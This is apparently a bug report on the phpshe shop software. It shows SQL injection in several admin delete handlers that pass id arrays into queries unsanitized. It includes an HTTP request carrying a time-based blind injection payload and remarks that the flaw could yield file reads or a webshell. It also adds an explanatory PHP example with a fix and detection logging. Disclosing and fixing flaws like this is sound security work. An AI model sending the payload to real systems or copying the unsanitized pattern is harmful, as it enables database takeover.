
koyshe / phpshe

I found multiple SQL injections in the admin backend.

Open, reported by p0desta
1. A vulnerability point

Look at the code

admin/user.php

	case 'del':
		pe_token_match();
		if ($db->pe_delete('user', array('user_id'=>is_array($_p_user_id) ? $_p_user_id : intval($_g_id)))) {
			pe_success('会员删除成功!');
		}
		else {
			pe_error('会员删除失败...');
		}
	break;

Notice that when a single record is deleted, the id passes through intval(). When records are deleted in batch, the array of ids is substituted into the statement directly, so a payload can be constructed as follows.

POST /phpshe/admin.php?mod=user&act=del&token=d52aa9e11515574f774c9da971a4ae10 HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Referer: http://www.test.com/fiyocms/
Cookie: PHPSESSID=2j08sefmgofettspbuso00fs07
Connection: keep-alive
Upgrade-Insecure-Requests: 1

checkall=on&user_id%5B%5D=2') and if(1,sleep(5),1)#
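To make the batch-delete bug concrete, here is an added example (not phpshe's own code) that models the pattern in plain PHP: a hypothetical where-builder that quotes array elements as-is, next to an input normaliser that would close the hole. The names build_where_unsafe(), sanitize_ids() and build_where_safe() are assumptions, as is the exact shape of the generated IN clause.

```php
<?php
// Added example (not phpshe's own code). build_where_unsafe() is a
// hypothetical stand-in for how a where-builder turns an array value into an
// IN (...) clause when each element is quoted as-is; sanitize_ids() shows the
// fix: every id is validated as a decimal integer before reaching the query.

// Constructed input equivalent to the request body shown above:
// checkall=on&user_id[]=2') and if(1,sleep(5),1)#
$p_user_id = ["2') and if(1,sleep(5),1)#"];

// Vulnerable pattern: array elements are interpolated without any casting.
function build_where_unsafe(string $field, $value): string {
    if (is_array($value)) {
        $quoted = array_map(fn($v) => "'" . $v . "'", $value);
        return "`$field` in (" . implode(',', $quoted) . ")";
    }
    return "`$field` = '" . $value . "'";
}

// Fix: normalise the id list up front, the way intval() already guards the
// single-id branch. Values that are not purely digits are logged and dropped
// rather than silently cast (intval("2') and ...") would return 2 and hide
// the attempt).
function sanitize_ids($value): array {
    $ids = is_array($value) ? $value : [$value];
    $clean = [];
    foreach ($ids as $id) {
        if (!preg_match('/^\d+$/', (string) $id)) {
            error_log('batch delete: rejected non-numeric id ' . substr((string) $id, 0, 40));
            continue;
        }
        $n = intval($id);
        if ($n > 0) {
            $clean[] = $n;
        }
    }
    return $clean;
}

function build_where_safe(string $field, array $ids): string {
    if ($ids === []) {
        throw new InvalidArgumentException('no valid ids supplied');
    }
    return "`$field` in (" . implode(',', $ids) . ")";
}

echo build_where_unsafe('user_id', $p_user_id), "\n"; // payload lands in the SQL
$ids = sanitize_ids($p_user_id);
echo $ids === [] ? "request rejected" : build_where_safe('user_id', $ids), "\n";
```

The rejected-id log line doubles as a detection hook: a burst of such entries from the admin delete actions is exactly what an attempt against this bug looks like.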


2. More code with the same pattern

admin/userbank.php

	case 'del':
		pe_token_match();
		$userbank_id = is_array($_p_userbank_id) ? $_p_userbank_id : $_g_id;
		if ($db->pe_delete('userbank', array('userbank_id'=>$userbank_id))) {
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;

admin/userlevel.php

	case 'del':
		pe_token_match();
		$userlevel_id = is_array($_p_userlevel_id) ? $_p_userlevel_id : intval($_g_id);
		if ($db->pe_delete('userlevel', array('userlevel_id'=>$userlevel_id))) {
			cache_write('userlevel');
			userlevel_callback();
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;

admin/ad.php

	case 'del':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_delete('ad', array('ad_id'=>$ad_id))) {
			cache_write('ad');
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;
	//####################// Ad state //####################//
	case 'state':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_update('ad', array('ad_id'=>$ad_id), array('ad_state'=>$_g_state))) {
			cache_write('ad');
			pe_success("操作成功!");
		}
		else {
			pe_error("操作失败...");
		}
	break;
	//####################// Ad list //####################//
	default :
		$_g_type && $sql_where .= " and `ad_type` = '{$_g_type}'";
		$_g_position && $sql_where .= " and `ad_position` = '{$_g_position}'";
		$sql_where .= " order by `ad_order` asc, `ad_id` desc";
		$info_list = $db->pe_selectall('ad', $sql_where, '*', array(20, $_g_page));
3. Verifying with another example

If the database account in the target environment has sufficient privileges, the injection can also be used to read files, or to write a file to get a shell.
